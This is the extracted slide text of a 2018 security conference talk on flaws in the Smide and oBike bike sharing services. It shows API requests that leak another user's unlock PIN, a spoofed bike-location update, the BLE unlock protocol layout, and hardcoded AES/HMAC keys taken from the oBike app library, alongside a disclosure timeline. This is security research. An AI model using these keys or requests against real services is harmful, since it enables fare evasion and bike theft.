Presentation held at the a41con.ch security conference

1. On the Security
of Bike Sharing
Services
Antoine
Neuenschwander
AREA41 June 15th 2018

2. whoami
Information Security Passionate
Hobby Penetration Tester
Beekeeper
You can find me on Twitter:
@ant0inet

4. Bike Sharing Services in Zurich
Jul 2017
Oct 2016 Jan 2018
May 2018

5. Bike Sharing How To
Install Mobile App
Sign-up
Buy credits
Locate a bike on the map
Start lease, ride & end lease
Leave bike on the spot

6. Risks & Threats
OPERATIONAL ISSUES
– payment bypass
– service availability
– data protection
BUSINESS IMPACT
– financial loss
– reputational damage
SAFETY & LIABILITY
– prevention of accidents

7. Smide
BASED IN ZURICH
backed by an
insurance company
HIGH-END E-BIKES
CHF 6’500 unit price
FLEET
approx. 400 bikes
(according to API)
TRACKING
integrated GPS and GSM
modem
FARE
0.25 CHF/min

8. Smide – Tracking
smide
GPS link
GSM link
REST

9. GET https://intern.smide.ch/api/v1/bikes HTTP/1.1
Accept: text/event-stream
HTTP/1.1 200 OK
Content-Type: text/event-stream; charset=UTF-8
{
"type": "update",
"data": {
"id": "46",
"name": "ZH253843",
"batteryLevel": 76,
"batteryRange": 40.0,
"size": "20",
"address": "Selnaustrasse 25, 8001 Zürich",
"location": {"lat": 47.371944, "lng": 8.532015}
}
} ...

10. Smide – Theft Protection
Theft mode is activated if
the locked ST2 S is moved
or pushed for an extended
period of time.
The motor is blocked and
the position of the ST2 S is
recorded periodically if a
cell network connection
exists.

11. Smide – Booking Process
vacant/
locked
booked/
unlocked
booked/
locked

12. POST /api/v1/user/login HTTP/1.1
Content-Type: application/json
{
"email": "foo@example.com",
"logintype": "password",
"password": "correcthorsebatterystaple"
}
HTTP/1.1 200 OK
Content-Type: application/json
{
"userId": "0123456789abcdef01234567",
"token": <JWT-User1>
}

13. <JWT-User1> =
eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ1c2VycyIsI
nVpZCI6IjAxMjM0NTY3ODlhYmNkZWYwMTIzNDU2NyIsInRpZCI6MTUwNDU
1OTkyMCwiZXhwIjoxNTA0NzMyNzIwfQ.F0GiaJaDxzaxa5GuoP-lvhI-r-
XmTAkCdWpJuqA2GiUDKizbaIaN1xc-uZmdqBPucUMGzGJ-
p7zZ5qx7_dpitQ
{ "alg": "HS512", "typ": "JWT" }
{
"iss": "users",
"uid": "0123456789abcdef01234567",
"tid": 1504559920,
"exp": 1504732720
}
1741a2689683c736b16b91aea0ffa5be123eafe5e64c0902756a49baa0
361a25032a2cdb68868dd7173eb9999da813ee714306cc627ea7bcd9e6
ac7bfdda62

14. Smide – Booking Process
vacant/
locked
booked/
unlocked
booked/
locked

15. POST /api/v1/booking HTTP/1.1
Authorization: Bearer <JWT USER-1>
Content-Type: application/json
{"bikeId": "133", "userId": "0123456789abcdef01234567"}
HTTP/1.1 200 OK
Content-Type: application/json
{
"bookingId": "12345",
"active": true,
"usage": false,
"pin": "",
"bike": { ... },
"startedAt": 1498257984
}

16. Smide – Booking Process
vacant/
locked
booked/
unlocked
booked/
locked

17. PUT /api/v1/booking/12345/usage HTTP/1.1
Authorization: Bearer <JWT USER-1>
Content-Type: application/json
{"pin": 0, "usage": false}
HTTP/1.1 200 OK
Content-Type: application/json
{
"usage": false,
"pin": "49637",
}

18. PUT /api/v1/booking/12345/usage HTTP/1.1
Authorization: Bearer <JWT USER-2>
Content-Type: application/json
{"pin": 0, "usage": false}
HTTP/1.1 200 OK
Content-Type: application/json
{
"usage": false,
"pin": "49637",
}

19. Vuln Report
24.06.2017, 1:30 sent vuln report to info@smide.ch
24.06.2017, 14:19 got receipt from customer support
28.06.2017, 9:31 reply from product owner:
– thanks for the report
– vuln was fixed on 26.06.
– 100 minutes offered

20. oBike
HQ IN SINGAPORE
deployed in 16
countries
LOW-END BIKES
single speed
unit price estimation
approx. USD 200
MAINTENANCE FREE
solid rubber tires
FARE
0.05 CHF/min

21. oBike – Tracking
oBike
G
PS
link
BLE link
REST

22. HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
{
"data": {
"iconUrl": null,
"list": [{
"id": "041002258",
"longitude": 8.535796,
"latitude": 47.377381,
"imei": "697432616C697A61",
"countryId": 167,
"helmet": 0
}, ... ]
},
"success": true
}
GET /api/v1/bike/list?longitude=8.5416&latitude=47.3749 HTTP/1.1
Host: mobile.o.bike

24. PUT /api/v1/bike/location HTTP/1.1
Host: mobile.o.bike
Authorization: Bearer <AuthToken>
{
"latitude": 47.3728299,
"longitude": 8.5306202,
"bikeId": "041002997"
}
HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
{
"data": { "message": " " },
"success": true
}
Location report success!

25. https://fccid.io/2ALWC-HBT203/Internal-Photos/Internal-photos-3381070

26. https://fccid.io/2ALWC-HBT203/Internal-Photos/Internal-photos-3381070

27. https://www.youtube.com/watch?v=Vl3Gl8w8n-Q

28. The AES encryption/decryption core allows the user
to encrypt and decrypt data using the AES algorithm
with 128-bit keys. The AES core also supports ECB,
CBC, CFB, OFB, CTR, and CBC-MAC, as well as
hardware support for CCM.

29. BLE Command Structure
67 74
preamble
0D
length
86
cmd
59 AE B6 .. 39 31
payload
check
FD
0x8X mobile → oBike
0x4X oBike → mobile
cmd ^ b[0] ^ b[1] ^ ... ^ b[N-1]
cmd
check

30. BLE Init
67 74
preamble
00
length
86
cmd check
86
request
67 74
preamble
00
length
46
cmd check
46
response

31. BLE Store Coordinates
67 74
preamble
13
length
81
cmd
30 38 2e 35 33 30 38 34 32 32
08.5308422
request
check
b7
34 37 2e 33 37 32 37 36 30
47.372760

32. BLE Receive Challenge
67 74
preamble
13
length
41
cmd
00 11 51 00
constant (unknown)
response
check
28aa
unknown
06 ef 5f 34
32 bit challenge
01 00
unknown

33. BLE Send Response
67 74
preamble
18
length
82
cmd
8b
key idx
request
check
77
00 00 01 23 45 67 00
user id
2a 72 9d 59
timestamp (little endian)
2f 42 d3 b4 3b 1b 9d 51 e7 67 13 e3
AES CBC-MAC (truncated to 96 bits, why?)

34. 67 74
preamble
18
length
46
cmd
response
check
8b
00 00 01 23 45 67 00
user id
59 9d 72 2a
timestamp (big endian)
44 31 39 33 36 42 33 31 37
bike id (D1936B317)
2a 72 9d 59
timestamp (little endian) trx
00
30 38 2e .. 32
08.5308422
34 37 2e .. 30
47.372760
87 76 f3 7a 8c be 90 f8 4b a4 fa 00 2e ae e3 dc
AES CBC-MAC (128 bits)
key idx
91

35. https://fccid.io/2ALWC-HBT203/Internal-Photos/Internal-photos-3381070
Texas Instruments
CC2541
Debug Pads

36. https://www.pentestpartners.com/security-blog/dumping-cc2540-firmware-an-iot-how-to/

37. http://web.archive.org/web/20180102175104/http://www.comp.nus.edu.sg/~hug
h/CS3235/CS3235-SemI-2017-18-FinalProjects.pdf

38. OBIKE MOBILE
APP
BACKEND
challenge
response
acknowledgement
unlock
bike
start
billing
BLE HTTP

39. HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
{
"data": {
"code": 400,
"error":
"The bike needs to be repaired, please try another one for your safety."
},
"success": false
}

40. HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
{
"data": {
"code": 500,
"error": "Server is busy,please try later"
},
"errorCode": 400,
"success": false
}
GET /api/v1/bike/list?longitude=8.5416&latitude=47.3749 HTTP/1.1
Host: mobile.o.bike

41. POST /api/v1/bike/list HTTP/1.1
Host: mobile.o.bike
{ "value":
"1a585fffc27493e530e50c48b834f0df905fa023d59a7db8d64bae39473cd75adc7c33e8a0
e9173845c9478046cff0c85bccbaecc7acd9cfadfc650c30cae4278d7f906da3a710742b637
279f21f5367f3ea2fd95564ee7077b85af5ef9ebcf7d456c15616ffda4f25524b587936984b
62abfe8a2a94c042d4893c9e74c267a42aed5310acc5fbb4924d57008cb2081e3e3009fdab5
cbc7fc640b72efc4e2ba2a10af81ac72aee5100e1c706b9eb500810e40aae855134fe9f625b
b34a3626e843922c7c2b222e6f32daf69f130e9350" }

43. $ hexdump -C lib/x86/libobike.so
...
00001c90 65 fc 5b 5d c3 41 45 53 2f 43 42 43 2f 50 4b 43 |e.[].AES/CBC/PKC|
00001ca0 53 35 50 61 64 64 69 6e 67 00 6f 42 41 64 64 4d |S5Padding.oBAddM|
00001cb0 59 46 55 7a 4c 65 64 00 31 32 33 34 35 36 37 38 |YFUzLed.12345678|
00001cc0 39 30 31 32 33 34 35 36 00 6f 42 61 64 64 58 34 |90123456.oBaddX4|
00001cd0 62 75 68 42 4d 47 00 41 45 53 00 53 48 41 31 00 |buhBMG.AES.SHA1.|
...

44. REST Encryption
AES-128
CBC
plaintext
SHA1
"oBaddX4buhBMG"
"&"
MAC
plaintext
MAC"&"
ciphertext
"oBAddMYFUzLed"
app version no.
"1234567890123456"

45. POST /api/v1/bike/list HTTP/1.1
Host: mobile.o.bike
{ "value":
"1a585fffc27493e530e50c48b834f0df905fa023d59a7db8d64bae39473cd75adc7c33e8a0
e9173845c9478046cff0c85bccbaecc7acd9cfadfc650c30cae4278d7f906da3a710742b637
279f21f5367f3ea2fd95564ee7077b85af5ef9ebcf7d456c15616ffda4f25524b587936984b
62abfe8a2a94c042d4893c9e74c267a42aed5310acc5fbb4924d57008cb2081e3e3009fdab5
cbc7fc640b72efc4e2ba2a10af81ac72aee5100e1c706b9eb500810e40aae855134fe9f625b
b34a3626e843922c7c2b222e6f32daf69f130e9350" }
{
"countryCode": 41,
"latitude": "47.37326917039802",
"longitude": "8.531275056302547",
"deviceId": "0123456789abc-0123456789abcdef01",
"dateTime": "1508318416019"
}
&21b7eaf2631f62fca73faf4c63fd75b1302aed4f

46. Conclusions
◎ Think about what could go wrong
which risks are you willing to accept?
◎ Perform security audits
get rid of the low hanging fruits
◎ Flaws will be found, keys will be leaked...
make the devices fixable

47. Thanks!
Any questions?
195.176.3.20
http://github.com/antoinet/obike
@ant0inet
@BrokenOBikes

48. HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
{
"data": {
"iconUrl": null,
"list": [{
"id": "041002258",
"longitude": 8.535796,
"latitude": 47.377381,
"imei": "697432616C697A61",
"countryId": 167,
"helmet": 0
}, ... ]
},
"success": true
}
GET /api/v1/bike/list?longitude=8.5416&latitude=47.3749 HTTP/1.1
Host: mobile.o.bike
International Mobile
Equipment Identity?

49. 726934686572616C ri4heral
69376F6E53696D39 i7onSim9
726934686572616C ri4heral
6F6E384C30503166 on8L0P1f
7469376F6E53696D ti7onSim
30503166756E6374 0P1funct
30503166756E6374 0P1funct
7432616C697A6174 t2alizat
6E53696D39706C65 nSim9ple
69376F6E53696D39 i7onSim9
616C48496E697477 alHInitw
756E637469376F6E uncti7on
3166756e63746937 1functi7
4C30503166756E63 L0P1func
756E637469376F6E uncti7on
686572616C48496E heralHIn
3166756E63746937 1functi7
4550657269346865 EPeri4he
7432616C697A6174 t2alizat
3166756E63746937 1functi7
697432616C697A61 it2aliza
6C697A6174346F6E lizat4on
6C48496E6974776F lHInitwo
616C48496E697477 alHInitw
4C30503166756E63 L0P1func
39706C65424C4550 9pleBLEP
66756E637469376F functi7o
686572616C48496E heralHIn
6934686572616C48 i4heralH
616C697A6174346F alizat4o
6E384C3050316675 n8L0P1fu
4550657269346865 EPeri4he
376F6E53696D3970 7onSim9p
32616C697A617434 2alizat4
616C48496E697477 alHInitw
696D39706C65424C im9pleBL
6572693468657261 eri4hera
4C30503166756E63 L0P1func
39706C65424C4550 9pleBLEP
6174346F6E384C30 at4on8L0
... InitalizatonLPfunctionSimpleBLEPeriheralHInitwo ...